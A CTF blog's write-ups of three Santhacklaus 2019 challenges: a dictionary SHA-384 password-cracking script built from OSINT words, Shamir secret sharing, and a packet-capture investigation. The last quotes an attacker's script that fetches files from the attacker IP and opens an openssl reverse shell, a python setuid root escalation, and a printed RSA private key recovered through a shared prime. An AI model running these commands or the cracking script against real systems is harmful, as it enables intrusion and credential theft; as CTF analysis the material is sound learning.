<span class="c1"># coding : utf-8</span>
<span class="kn">import</span> <span class="nn">hashlib</span>
<span class="c1"># récupère l'ensemble des mots issus de l'OSINT</span>
<span class="n">liste</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s1">'liste'</span><span class="p">,</span> <span class="s1">'r'</span><span class="p">)</span><span class="o">.</span><span class="n">readlines</span><span class="p">()</span>
<span class="c1"># séparateurs possibles</span>
<span class="n">split</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'-'</span><span class="p">,</span> <span class="s1">'*'</span><span class="p">,</span> <span class="s1">'_'</span><span class="p">,</span> <span class="s1">'.'</span><span class="p">,</span> <span class="s1">'+'</span><span class="p">,</span> <span class="s1">'='</span><span class="p">,</span> <span class="s1">'§'</span><span class="p">,</span> <span class="s1">'!'</span><span class="p">,</span> <span class="s1">' '</span><span class="p">,</span> <span class="s1">'/'</span><span class="p">,</span> <span class="s1">'</span><span class="se">\\</span><span class="s1">'</span><span class="p">,</span> <span class="s1">'&'</span><span class="p">,</span> <span class="s1">'~'</span><span class="p">]</span>
<span class="c1"># nombre de 0 à 99</span>
<span class="n">nbrange</span> <span class="o">=</span> <span class="nb">range</span><span class="p">(</span><span class="mi">99</span><span class="p">)</span>
<span class="c1"># hash à retrouver</span>
<span class="n">target</span> <span class="o">=</span> <span class="s2">"90ebd54ded8e68191ab102429edd29993c185e43c1b43de0fd346b40c1b26c60ce1e4ae84c334da7c2ee81cb4dbfb48d"</span>
<span class="n">word</span> <span class="o">=</span> <span class="s1">'annecy'</span>
<span class="k">for</span> <span class="n">sep</span> <span class="ow">in</span> <span class="n">split</span><span class="p">:</span>
<span class="k">for</span> <span class="n">sep2</span> <span class="ow">in</span> <span class="n">split</span><span class="p">:</span>
<span class="k">for</span> <span class="n">number</span> <span class="ow">in</span> <span class="n">nbrange</span><span class="p">:</span>
<span class="k">for</span> <span class="n">lastword</span> <span class="ow">in</span> <span class="n">liste</span><span class="p">:</span>
<span class="n">password</span> <span class="o">=</span> <span class="p">(</span><span class="n">word</span> <span class="o">+</span> <span class="n">sep</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">number</span><span class="p">)</span> <span class="o">+</span> <span class="n">sep2</span> <span class="o">+</span> <span class="n">lastword</span><span class="p">)</span><span class="o">.</span><span class="n">rstrip</span><span class="p">()</span>
<span class="n">sha384</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">sha384</span><span class="p">(</span><span class="n">password</span><span class="o">.</span><span class="n">encode</span><span class="p">())</span><span class="o">.</span><span class="n">hexdigest</span><span class="p">()</span>
<span class="k">if</span> <span class="n">sha384</span> <span class="o">==</span> <span class="n">target</span> <span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"FOUND !"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"The password is : "</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="k">pass</span>
</code></pre></div>
<p>This is enough to generate a dictionary of 2375802 lines from the list of 142 words.</p>
<p>To avoid hammering the site, and since we have the target hash, comparing the hashes generated from our list against the one found on Facebook lets us recover the full password (<a href="https://github.com/Oseid/HASHCat">HASHCat</a>):</p>
<div class="highlight"><pre><span></span><code>$ python script.py
FOUND !
The password is : annecy+44+saitama
</code></pre></div>
<h3>"Intelligente"</h3>
<p>We can also go to <a href="https://crackstation.net">https://crackstation.net</a> or <a href="https://md5hashing.net">https://md5hashing.net</a> and see whether a plaintext result is returned.</p>
<p><img alt="witchehh4.png" src="https://blog.nlegall.fr/images/santhacklaus/witchehh4.png"></p>
<p>BINGO! We have the password.</p>
<h2>Port 2000</h2>
<p>So we have the password. We can log in to his account on the blog. That lets us display the image we had already found earlier during reconnaissance.</p>
<p>All that remains is to connect over <code>telnet</code>:</p>
<div class="highlight"><pre><span></span><code>$ telnet <span class="m">46</span>.30.204.44 <span class="m">2000</span>
Username : witchehh
Password : annecy+44+saitama
Welcome, here is your flag : SANTA<span class="o">{</span>Cr4cK_L0rD<span class="o">}</span>
</code></pre></div>
<p>YEAH! That's the flag, and the points with it :D.</p>Santhacklaus 2019 - Shamir's 10th prisoner dilemna2019-12-26T00:00:00+01:002019-12-26T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-26:/santhacklaus-2019-shamirs-10th-prisoner-dilemna.html<div class="highlight"><pre><span></span><code>Come on cheaters. This challenge is for you. You can communicate with others, work with them, we don't care. You won't ever find out what this challenge is about. You really thought we weren't gonna troll you a bit ? Come on... be realistic... this is a CTF... So here you go, have fun, you've got not link, no file, nothing.
May the secret sent to you by email be known by anyone else than yourself, you'll find yourself in a situation you would rather not get into... (check your spams)...
For users registered after 21/12/2019 - 06:00 PM. You can ask us (Shutdown or m3lsius) for you secret on Discord. Be aware that we will proceed to a few checks before giving it to you (to check your rules compliance), and we do not guarantee you a quick answer, or even an answer at all.
</code></pre></div>
<p>Well, having no idea what this is about, we start with a web search: <a href="https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing">https://en.wikipedia.org/wiki/Shamir%27s_Secret_Sharing</a>.</p>
<p>We learn there that it is an algorithm created by the eponymous person (<a href="https://en.wikipedia.org/wiki/Adi_Shamir">Adi Shamir</a>). This algorithm splits a message into X parts, and a minimum of Y parts are needed to recover the original message.</p>
<p>Each participant therefore received their secret by email:</p>
<div class="highlight"><pre><span></span><code>Hello fierce challenger.
Here is a secret you must keep until the end of the CTF.
0203-20e9326051e1c4b8c8a2c191d573fd0e8dc3c9900af37a58fd25113aa8bd75ab199e4022b3a6687e50a4c8fad1208d0c46f54ee6ca
</code></pre></div>
<p>OK, it says we must keep it secret, but we need to gather several of them to get the flag. So we have to exchange among ourselves while staying discreet...</p>
<p>Having a few friends among the participants, we trade our secrets for beers :).</p>
<p>Here I am in possession of a first series of secrets:</p>
<div class="highlight"><pre><span></span><code>0256-a97f86326b5a7915e902469ead07567f5922e62a4fb5e1f5b7a0d5752f69c2ca7640b15ed0b3114ff1dc754134ee89ddf574c32970
0122-d7ed069ea110295452d9ffbdf41a2ed3fa2f7947eb390958fb33beaba0a03c373ceecbddfe6fe1589566478ef58c23c1c1cdfe1ee0
0091-49761787cb1b4637f72de9d8d21411aec00fc1bd2744d9799cdb9621b6f268ce1700bf073f2b20928c8c2c11d84f7d5bdb352b72a6
</code></pre></div>
<p>That makes a total of 4 with mine. One might think that could be enough. Now we need a tool to interpret all this. We then find the following page: <a href="http://point-at-infinity.org/ssss/">http://point-at-infinity.org/ssss/</a>. It explains how the scheme works and offers a binary (<code>ssss</code>) as well as an online version (<a href="http://point-at-infinity.org/ssss/demo.html">http://point-at-infinity.org/ssss/demo.html</a>).</p>
<p>Always preferring the CLI, we grab the binary, which gives us the <code>ssss-combine</code> command. We pass it the number of shares we have with the <code>-t</code> argument and it reconstructs the secret. Which gives us:</p>
<div class="highlight"><pre><span></span><code>$ ssss-combine -t <span class="m">4</span>
Enter <span class="m">4</span> shares separated by newlines:
Share <span class="o">[</span><span class="m">1</span>/4<span class="o">]</span>: <span class="m">0203</span>-20e9326051e1c4b8c8a2c191d573fd0e8dc3c9900af37a58fd25113aa8bd75ab199e4022b3a6687e50a4c8fad1208d0c46f54ee6ca
Share <span class="o">[</span><span class="m">2</span>/4<span class="o">]</span>: <span class="m">0256</span>-a97f86326b5a7915e902469ead07567f5922e62a4fb5e1f5b7a0d5752f69c2ca7640b15ed0b3114ff1dc754134ee89ddf574c32970
Share <span class="o">[</span><span class="m">3</span>/4<span class="o">]</span>: <span class="m">0122</span>-d7ed069ea110295452d9ffbdf41a2ed3fa2f7947eb390958fb33beaba0a03c373ceecbddfe6fe1589566478ef58c23c1c1cdfe1ee0
Share <span class="o">[</span><span class="m">4</span>/4<span class="o">]</span>: <span class="m">0091</span>-49761787cb1b4637f72de9d8d21411aec00fc1bd2744d9799cdb9621b6f268ce1700bf073f2b20928c8c2c11d84f7d5bdb352b72a6
Resulting secret: .Z....0Q.sv....<span class="p">&</span>zL......e.. ..,.6.@-....#A._.7.8...<span class="o">(</span>.
WARNING: binary data detected, use -x mode instead.
</code></pre></div>
<p>Hmm... Not very conclusive.</p>
<p>We reread the title and notice that it speaks of the tenth prisoner. So perhaps 10 shares in total are needed to reconstruct the secret.</p>
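<p>To see why four shares gave binary garbage while ten will give the flag, here is an added toy implementation of Shamir's scheme (example code written for this write-up, not the <code>ssss</code> tool's code or share format): a random polynomial over a prime field whose constant term is the secret, recombined by Lagrange interpolation at zero. The <code>NNNN-hex</code> share layout only mimics the look of the challenge mails, and the flag bytes are a constructed placeholder.</p>

```python
import secrets

# 2**521 - 1 is prime; any secret shorter than 65 bytes fits in the field.
PRIME = 2**521 - 1


def _eval_poly(coeffs, x):
    """Horner evaluation of coeffs[0] + coeffs[1]*x + ... modulo PRIME."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % PRIME
    return acc


def split_secret(secret: bytes, n: int, t: int) -> list:
    """Split secret into n shares such that any t of them reconstruct it.

    The constant term of a random degree t-1 polynomial is the secret; share i
    is the point (i, f(i)).  Shares are rendered 'NNNN-hex' to resemble the
    lines the challenge mailed out (look only; this is not ssss's encoding).
    """
    if not 1 < t <= n:
        raise ValueError("need 1 < t <= n")
    s = int.from_bytes(secret, "big")
    if s >= PRIME:
        raise ValueError("secret too long for the field")
    coeffs = [s] + [secrets.randbelow(PRIME) for _ in range(t - 1)]
    return ["%04d-%x" % (x, _eval_poly(coeffs, x)) for x in range(1, n + 1)]


def combine_shares(shares: list) -> bytes:
    """Lagrange interpolation at x = 0 over whatever shares are given.

    Nothing here knows t: with fewer than t shares the interpolated value is a
    uniformly random field element, i.e. the 'binary data' ssss-combine warned
    about for -t 4, and no number of guesses narrows it down.
    """
    points = []
    for share in shares:
        idx, hexval = share.split("-", 1)
        points.append((int(idx, 10), int(hexval, 16)))
    secret = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * (-xj) % PRIME
                den = den * (xi - xj) % PRIME
        secret = (secret + yi * num * pow(den, -1, PRIME)) % PRIME
    return secret.to_bytes((secret.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    flag = b"SANTA{constructed_placeholder_flag}"  # constructed, not the real one
    shares = split_secret(flag, n=12, t=10)
    print("with 4 shares :", combine_shares(shares[:4])[:12], "...")
    print("with 10 shares:", combine_shares(shares[2:12]))
```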
<p>We exchange with other participants, using steganography and pastebins to share them, and here we are in possession of the ten shares.</p>
<p>We rerun the command with all the shares:</p>
<div class="highlight"><pre><span></span><code>$ ssss-combine -t <span class="m">10</span>
Enter <span class="m">10</span> shares separated by newlines:
Share <span class="o">[</span><span class="m">1</span>/10<span class="o">]</span>: <span class="m">0203</span>-20e9326051e1c4b8c8a2c191d573fd0e8dc3c9900af37a58fd25113aa8bd75ab199e4022b3a6687e50a4c8fad1208d0c46f54ee6ca
<span class="o">[</span>...<span class="o">]</span>
Share <span class="o">[</span><span class="m">10</span>/10<span class="o">]</span>: <span class="m">0091</span>-49761787cb1b4637f72de9d8d21411aec00fc1bd2744d9799cdb9621b6f268ce1700bf073f2b20928c8c2c11d84f7d5bdb352b72a6
Resulting secret: SANTA<span class="o">{</span>c0mmun1c4tion_I5_KEEEEEEEY_jeveuxdeschaussures<span class="o">}</span>
</code></pre></div>
<p>And that's the FLAG!</p>
<p><img alt="https://i.giphy.com/media/13KtvzT3PWytgY/giphy.webp" src="https://i.giphy.com/media/13KtvzT3PWytgY/giphy.webp"></p>
<p>A very interesting challenge that forces interaction between participants. Thanks again <3.</p>Santhacklaus 2019 - Revmomon2019-12-25T00:00:00+01:002019-12-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-25:/santhacklaus-2019-revmomon.html<div class="highlight"><pre><span></span><code>Suspicious activity has been detected. Probably nothing to be scared about but take a look anyway.
If you find anything, a backdoor, a malware or anything of this kind, flag is the sha256 of it.
</code></pre></div>
<h2>Statistics</h2>
<table>
<thead>
<tr>
<th>Measurement</th>
<th>Captured</th>
</tr>
</thead>
<tbody>
<tr>
<td>Packets</td>
<td>185701</td>
</tr>
<tr>
<td>Time span, s</td>
<td>653.730</td>
</tr>
<tr>
<td>Average pps</td>
<td>284.1</td>
</tr>
<tr>
<td>Average packet size, B</td>
<td>165</td>
</tr>
<tr>
<td>Bytes</td>
<td>30632502</td>
</tr>
<tr>
<td>Average bytes/s</td>
<td>46 k</td>
</tr>
<tr>
<td>Average bits/s</td>
<td>374 k</td>
</tr>
</tbody>
</table>
<h2>First analysis</h2>
<p>A first look shows that the capture contains a lot of information and exchanges, but also a lot of noise. A filter hiding everything that does not concern us makes the whole thing clearer:</p>
<ul>
<li>Remove the TCP handshake at the start: <code>not tcp.flags == 0x002 && not tcp.flags == 0x014</code></li>
<li>Remove the package installation part: <code>not ip.addr == 212.211.132.250 && not ip.addr == 151.101.120.204 && not ip.addr == 130.89.148.77</code></li>
<li>Remove the HTTP errors from the reconnaissance phase: <code>not http.response.code == 404</code></li>
</ul>
<p>OK, it's clearer now. At the end of the capture, we see that a TLSv1.2 exchange is initiated. It would therefore be interesting to manage to decrypt its contents.</p>
<h2>TLS and private keys</h2>
<p>We apply a filter to keep only the TLS exchanges and, above all, the handshakes. It is in this first exchange between client and server that the certificate chain (which is what interests us here), the cipher to use and other technical parameters are exchanged.</p>
<p>We set our filter: <code>tls.handshake.certificate</code> (a refined version that only shows packets containing certificates).</p>
<p><img alt="revmomon1" src="https://blog.nlegall.fr/images/santhacklaus/revmomon1.png"></p>
<p>So two servers initiated a TLS connection, hence possibly two certificates to retrieve. A <code>tshark</code> command will let us extract all of that:</p>
<div class="highlight"><pre><span></span><code>$ tshark -r challenge.pcapng -2 -R <span class="s2">"tls.handshake.certificate"</span> -T fields -e tls.handshake.certificate <span class="p">|</span> sort -u <span class="p">|</span> uniq
<span class="o">[</span>...<span class="o">]</span>
308203933082027ba00302010202147687e8f8299f8e13e23e4187ba389f139329e24d300d06092a864886f70d01010b05003059310b3009060355040613025255310f300d06035504080c06527573736965310f300d06035504070c064d6f73636f7731173015060355040a0c0e5072696d65206d696e6973746572310f300d060355040b0c06476f756c6167301e170d3139313032393233333631385a170d3238303131353233333631385a3059310b3009060355040613025255310f300d06035504080c06527573736965310f300d06035504070c064d6f73636f7731173015060355040a0c0e5072696d65206d696e6973746572310f300d060355040b0c06476f756c616730820122300d06092a864886f70d01010105000382010f003082010a0282010100f24eac4339289aa0a378e3c9d7489d630e4afc427f72b2c259c299cbbf61c8e8880076e73f789cadf783f12eea9dbe87c0cc8abeebb5acb90004ff115150a50e57f230a71930ef29f24823fb1b3cd85ccc241789884b2a486eadffcce9dbafd6d68aad196a5d7ab6da3b47998f4dc4c6eca879d6cd8207ee602a9eec007d581f3f07ba774c48f09cd13b6d17384412f92a1ab3076a6562bacd0ea868af98e8fd10600c6767406304a34f80f2864f1b39aae1dfa51364f10381425ca070d8ce82f8f766c2492d2b5645dbac3f324d2010ee43561d0c80f92e9841627d39aaf50829532f2a922fe3f32237db432617a5907abe2ab601697661705106fa2af2a7490203010001a3533051301d0603551d0e0416041403c8b22eff2cd0d1c0f6b84f7c7a8dd9b4019075301f0603551d2304183016801403c8b22eff2cd0d1c0f6b84f7c7a8dd9b4019075300f0603551d130101ff040530030101ff300d06092a864886f70d01010b05000382010100e1dbc5647cb3ef9bfa4e12e2412f3d81e943eddb350b3a938916b33e2c88ce5b8196633e52d9054a6eee5b47309c559167147426f8b2a34beebcd0e72bdcadbe9e73787635446200e45c67d0912d2c4004fa89bfe2bed7b0bf6739c0b6101129115275b10415d961f64eefd63bec93c143f88387125b3decdffff45bbf277f397bb3dbabe35b0c63e49ff5f7ab7c4551a03aec077bb699970cfebff9f7eb85ab7a13532f390a6a14fcac7e817648ac1b578d41448fa2b4bf1d6351573a49124f827d7638af621f0cb1679ad1f4fde6989aa2151cdec8e89eff04a92c3995d0a744e0de716a9d1f551e8f4d2c8290d53d6b8f2f354610e701bdce1846d607f6d5
</code></pre></div>
<p>This gives us the certificates in hexadecimal. We convert them to binary (DER) with <code>xxd -r -p</code>.</p>
<p>We thus get three certificates:</p>
<ul>
<li><code>Subject: C = FR, ST = France, L = Paris, O = Prime Minister, OU = Brexit FTW</code></li>
<li><code>Subject: C = RU, ST = Russie, L = Moscow, O = Prime minister, OU = Goulag</code></li>
<li><code>Subject: O =</code></li>
</ul>
<p>We can eliminate the third one, which contains no useful information for us.</p>
<p>To decrypt the TLS stream, we need to recover the private keys associated with these two certificates. Already used in other CTFs, the <code>RsaCtfTool</code> tool is well suited to this job. So we run it on the first certificate:</p>
<p>Hmm, nothing found. We run it on the second one, with no result either. Looking at the documentation, we see that it can be given several public keys at once: <code>public key file. You can use wildcards for multiple keys.</code>.</p>
<p>So we rerun the command with both certificates at once and the answer comes almost instantly:</p>
<div class="highlight"><pre><span></span><code>python RsaCtfTool.py --publickey <span class="s1">'certs/*.pem'</span> --private --verbose
<span class="o">[</span>*<span class="o">]</span> Multikey mode using keys: <span class="o">[</span><span class="s1">'certs/2.pem'</span>, <span class="s1">'certs/1.pem'</span><span class="o">]</span>
<span class="o">[</span>*<span class="o">]</span> Found common factor in modulus <span class="k">for</span> certs/2.pem and certs/1.pem
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEA8k6sQzkomqCjeOPJ10idYw5K/EJ/crLCWcKZy79hyOiIAHbn
P3icrfeD8S7qnb6HwMyKvuu1rLkABP8RUVClDlfyMKcZMO8p8kgj+xs82FzMJBeJ
iEsqSG6t/8zp26/W1oqtGWpderbaO0eZj03ExuyoedbNggfuYCqe7AB9WB8/B7p3
TEjwnNE7bRc4RBL5KhqzB2plYrrNDqhor5jo/RBgDGdnQGMEo0+A8oZPGzmq4d+l
E2TxA4FCXKBw2M6C+PdmwkktK1ZF26w/Mk0gEO5DVh0MgPkumEFifTmq9QgpUy8q
ki/j8yI320MmF6WQer4qtgFpdmFwUQb6KvKnSQIDAQABAoIBAHp/Y38oqmphw8Me
BbCcuVSWqToWtC/cR3zxcKccvebAB+GUOxxPcYZRl5aazWmqJR9HSO10ZIhJjsT3
3l1pk8hIldwa3hVrE5208tvDzWLkpx+n9pO8zEeKDNVBVwkFQGt9+DzdFR0wy+sk
K3HTMyQOCK5v9b1DHTPo2CcfqD6fsXW1cG3VfqlvT+iXyp9Z8hreA78MTEnfSzVW
g/UMUn1Y/ZjiO7l34JBm2Q0aiHBiRdBIatTDDw9uATrY491Ut/bRCWo9++iC7Kz0
t5jH28YynQp7upq2ZaLtb3QA/aggEdTN+jWs/EZSmdSY1JN2zUrPkJ81FR3vw+/z
paUe27ECgYEA9Qgo401V7TQhlP0XNKsWFuH6GwmZKEBBtXBF9nk26CbTZ+Er6SS0
tm3zYqUH+VkdnO+c//S/FmG/eSi3e4kB5dGsskzGzjjJzbtACenn1SRBUo0TfCZy
T6DMWXMDRvuOJEWYa8jCJ040qCSIbGYg9WoJ6+jn9jwtpIbZkqLS9pMCgYEA/SdK
0PMQ9UMOtW2PjPwCKF8uymRdh4KgfWufWmrsCTsHYqinKrF9FhxUeSNHN2qPmPnI
yW0LIvcVAzVA5c9weJgvqOfOigsBQaOcW0FqO8OswtGPyH3//dUIyB/vuZu5LYi4
93ECyON95PXpubDvgY4GJwM0Lo9vpdaqt/nTWDMCgYBLWUQBidGHjMVa5G0TZBz5
0mmvkMcJKqFKIwlQnru0rePKiOKQ4hm0E6GJTwhhs/a4QLK9vsxYHJzdrBioI1xz
CIQbnCJyXeIoopExuzzwPSLdOMaqIcR7Gg5c31I9rLNsEf6p/mU94v2sSvespccy
0HXWlptmC+FZO6KCRhGrgwKBgBQETVgkQA0Ell8mIJmnO4xxqkN6mCKk44fHQLxn
g+5e6oCUkVNA4YEkEFHbxj/Nfzk7VvMGWkEThGfSiCUjt+LxNaOHYL9ti1XjV/On
Qn0jRb/JzjKuM9WgSKd6TvxAIe5Fx0pZdzznMAcwoqB6KxX1Yusmx7N+x/c2+By/
9kQdAoGAYxsY9EhchdDsUy5f2DrsQIeCQJueLexVVxebo4rpgb7NCybqqI55qbjd
2CMdY+8Fw74L2zxwgFDgngrIHsjIMqUNp64pgp+4qqjN+ix0ue86ZTlnaqgK3uaw
DDlBMgDIvOc+FYcy1aeqpCQHi8R1EIjlqZGvlV8wTwv9dJ+N/ug<span class="o">=</span>
-----END RSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
<span class="o">[</span>...<span class="o">]</span>
-----END RSA PRIVATE KEY-----
</code></pre></div>
<p>Bingo! So we have, in order, the key for the second certificate and then for the first. We can easily validate this by checking the modulus of each:</p>
<div class="highlight"><pre><span></span><code>$ openssl x509 -inform der -in <span class="m">2</span>.pem -modulus --noout
<span class="nv">Modulus</span><span class="o">=</span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
$ openssl rsa -in <span class="m">2</span>.key -modulus --noout
<span class="nv">Modulus</span><span class="o">=</span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
</code></pre></div>
<p>We can therefore load our two recovered keys into Wireshark to decrypt all the TLS exchanges.</p>
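<p>Why the multikey run succeeded where the single-key runs failed: the two moduli share a prime, so one <code>gcd</code> factors both, and the same pairwise gcd is the check a defender runs over a fleet of collected certificates to catch keys generated from a poor entropy source. Added example (not the challenge's keys, not RsaCtfTool's code) using constructed toy primes that are far too small for real use.</p>

```python
from itertools import combinations
from math import gcd

E = 65537

# Constructed toy primes.  P_SHARED is reused by two key pairs, which is the
# flaw RsaCtfTool reported as "Found common factor in modulus".
P_SHARED, Q1, Q2 = 1000003, 1000033, 1000037
P3, Q3 = 1000039, 1000081  # an unrelated, healthy third key


def rsa_modulus(p, q):
    return p * q


def private_exponent(p, q, e=E):
    """d = e^-1 mod (p-1)(q-1); with the factors known the private key is immediate."""
    return pow(e, -1, (p - 1) * (q - 1))


def recover_from_shared_factor(n1, n2, e=E):
    """If n1 and n2 share a prime, one gcd factors both; returns (d1, d2) or None."""
    p = gcd(n1, n2)
    if p in (1, n1, n2):
        return None  # coprime, or the very same modulus twice
    q1, q2 = n1 // p, n2 // p
    return private_exponent(p, q1, e), private_exponent(p, q2, e)


def find_shared_factors(moduli):
    """Defender-side fleet check: pairwise gcd over every collected modulus.

    Returns [(index_a, index_b, common_factor), ...] for each weak pair.
    O(n^2) gcds is fine for a few thousand certificates; batch-gcd scales further.
    """
    weak = []
    for (i, n1), (j, n2) in combinations(enumerate(moduli), 2):
        g = gcd(n1, n2)
        if g not in (1, n1, n2):
            weak.append((i, j, g))
    return weak


def roundtrip_ok(n, d, m, e=E):
    """Sanity check that the recovered d really inverts the public operation."""
    return pow(pow(m, e, n), d, n) == m


if __name__ == "__main__":
    moduli = [rsa_modulus(P_SHARED, Q1), rsa_modulus(P_SHARED, Q2), rsa_modulus(P3, Q3)]
    print("weak pairs:", find_shared_factors(moduli))
    d1, d2 = recover_from_shared_factor(moduli[0], moduli[1])
    print("key 1 round-trips:", roundtrip_ok(moduli[0], d1, 123456789))
    print("key 2 round-trips:", roundtrip_ok(moduli[1], d2, 987654321))
```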
<h2>TLS analysis</h2>
<p>We can now see the content of the requests in plaintext.</p>
<p>The first to appear is the following (<code>tcp.stream eq 85667</code>):</p>
<div class="highlight"><pre><span></span><code><span class="nf">GET</span> <span class="nn">/a.sh</span> <span class="kr">HTTP</span><span class="o">/</span><span class="m">1.1</span>
<span class="na">Host</span><span class="o">:</span> <span class="l">172.17.0.1</span>
<span class="na">User-Agent</span><span class="o">:</span> <span class="l">curl/7.64.0</span>
<span class="na">Accept</span><span class="o">:</span> <span class="l">*/*</span>
</code></pre></div>
<p>It is a shell script that opens an encrypted reverse shell on the target machine:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/sh</span>
<span class="nv">IP_ATTACKER</span><span class="o">=</span><span class="s2">"172.17.0.1"</span>
<span class="nv">OPENSSL_PATH</span><span class="o">=</span><span class="k">$(</span>which openssl<span class="k">)</span>
wget --no-check-certificate https://<span class="si">${</span><span class="nv">IP_ATTACKER</span><span class="si">}</span>:443/cert2.crt -O /dev/shm/cert.pem
mkfifo /tmp/s<span class="p">;</span> /bin/sh -i < /tmp/s <span class="m">2</span>><span class="p">&</span><span class="m">1</span> <span class="p">|</span> <span class="si">${</span><span class="nv">OPENSSL_PATH</span><span class="si">}</span> s_client -quiet -CAfile /dev/shm/cert.pem -verify_return_error -verify <span class="m">1</span> -connect <span class="si">${</span><span class="nv">IP_ATTACKER</span><span class="si">}</span>:8443 > /tmp/s<span class="p">;</span> rm /tmp/s
</code></pre></div>
<p>The second request (<code>tcp.stream eq 85669</code>) corresponds to all the actions performed by the attacker through the reverse shell created just before:</p>
<p>There he retrieves the <code>LinEnum.sh</code> script (<code>wget --no-check-certificate https://172.17.0.1/LinEnum.sh</code>). That lets him do reconnaissance on the target system, but it does not in itself constitute the attack we are looking for to get our flag.</p>
<p>So we continue through the executed commands and reach a very interesting part:</p>
<div class="highlight"><pre><span></span><code>www-data@d58feef475e4:/tmp$ /usr/bin/python2.7 -c <span class="s1">'import os; os.setuid(0); os.system("/bin/sh")'</span>
< -c <span class="s1">'import os; os.setuid(0); os.system("/bin/sh")'</span>
root@d58feef475e4:# id
id
<span class="nv">uid</span><span class="o">=</span><span class="m">0</span><span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">33</span><span class="o">(</span>www-data<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">33</span><span class="o">(</span>www-data<span class="o">)</span>
root@d58feef475e4:# <span class="nb">cd</span> /root
root@d58feef475e4:# <span class="nb">cd</span> /root
root@d58feef475e4:# ls -la
total <span class="m">20</span>
drwx------ <span class="m">1</span> root root <span class="m">4096</span> Nov <span class="m">20</span> <span class="m">21</span>:37 .
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Nov <span class="m">20</span> <span class="m">21</span>:51 ..
-rw-r--r-- <span class="m">1</span> root root <span class="m">570</span> Jan <span class="m">31</span> <span class="m">2010</span> .bashrc
-rw-r--r-- <span class="m">1</span> root root <span class="m">148</span> Aug <span class="m">17</span> <span class="m">2015</span> .profile
-r-------- <span class="m">1</span> root root <span class="m">28</span> Nov <span class="m">20</span> <span class="m">21</span>:36 flag
root@d58feef475e4:# wc -c flag
<span class="m">28</span> flag
root@d58feef475e4:# stat flag
File: flag
Size: <span class="m">28</span> Blocks: <span class="m">8</span> IO Block: <span class="m">4096</span> regular file
Device: 78h/120d Inode: <span class="m">6206622</span> Links: <span class="m">1</span>
Access: <span class="o">(</span><span class="m">0400</span>/-r--------<span class="o">)</span> Uid: <span class="o">(</span> <span class="m">0</span>/ root<span class="o">)</span> Gid: <span class="o">(</span> <span class="m">0</span>/ root<span class="o">)</span>
Access: <span class="m">2019</span>-11-20 <span class="m">21</span>:36:58.000000000 +0000
Modify: <span class="m">2019</span>-11-20 <span class="m">21</span>:36:58.000000000 +0000
Change: <span class="m">2019</span>-11-20 <span class="m">21</span>:38:07.737200347 +0000
Birth: -
root@d58feef475e4:# <span class="nb">echo</span> -n <span class="s1">'Il y a le flag dans le /root'</span>
Il y a le flag dans le /root#
root@d58feef475e4:# <span class="nb">cd</span> /usr/local/bin
<span class="nb">cd</span> /usr/local/bin
<span class="o">[</span>...<span class="o">]</span>
root@d58feef475e4:# ls
apache2-foreground docker-php-ext-install peardev php
docker-php-entrypoint docker-php-source pecl php-config
docker-php-ext-configure freetype-config phar phpdbg
docker-php-ext-enable pear phar.phar phpize
root@d58feef475e4:# wget --no-check-certificate https://172.17.0.1/DRUNK_IKEBANA -O phar.bak
--2019-11-20 <span class="m">22</span>:03:12-- https://172.17.0.1/DRUNK_IKEBANA
Connecting to <span class="m">172</span>.17.0.1:443... connected.
WARNING: The certificate of <span class="s1">'172.17.0.1'</span> is not trusted.
WARNING: The certificate of <span class="s1">'172.17.0.1'</span> doesn<span class="s1">'t have a known issuer.</span>
<span class="s1">The certificate'</span>s owner does not match hostname <span class="s1">'172.17.0.1'</span>
HTTP request sent, awaiting response... <span class="m">200</span> OK
Length: <span class="m">7634240</span> <span class="o">(</span><span class="m">7</span>.3M<span class="o">)</span> <span class="o">[</span>application/octet-stream<span class="o">]</span>
Saving to: <span class="s1">'phar.bak'</span>
phar.bak <span class="m">0</span>%<span class="o">[</span> <span class="o">]</span> <span class="m">0</span> --.-KB/s
phar.bak <span class="m">100</span>%<span class="o">[===================</span>><span class="o">]</span> <span class="m">7</span>.28M --.-KB/s in <span class="m">0</span>.05s
<span class="m">2019</span>-11-20 <span class="m">22</span>:03:12 <span class="o">(</span><span class="m">146</span> MB/s<span class="o">)</span> - <span class="s1">'phar.bak'</span> saved <span class="o">[</span><span class="m">7634240</span>/7634240<span class="o">]</span>
<span class="o">[</span>...<span class="o">]</span>
root@d58feef475e4:# ls -la
total <span class="m">35168</span>
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Nov <span class="m">20</span> <span class="m">22</span>:03 .
drwxr-xr-x <span class="m">1</span> root root <span class="m">4096</span> Oct <span class="m">25</span> <span class="m">02</span>:29 ..
-rwxrwxr-x <span class="m">1</span> root root <span class="m">1346</span> Oct <span class="m">25</span> <span class="m">02</span>:26 apache2-foreground
<span class="o">[</span>...<span class="o">]</span>
lrwxrwxrwx <span class="m">1</span> root root <span class="m">9</span> Oct <span class="m">25</span> <span class="m">02</span>:29 phar -> phar.phar
-rw-r--r-- <span class="m">1</span> root www-data <span class="m">7634240</span> Nov <span class="m">20</span> <span class="m">22</span>:02 phar.bak
-rwxr-xr-x <span class="m">1</span> root root <span class="m">14817</span> Oct <span class="m">25</span> <span class="m">02</span>:29 phar.phar
<span class="o">[</span>...<span class="o">]</span>
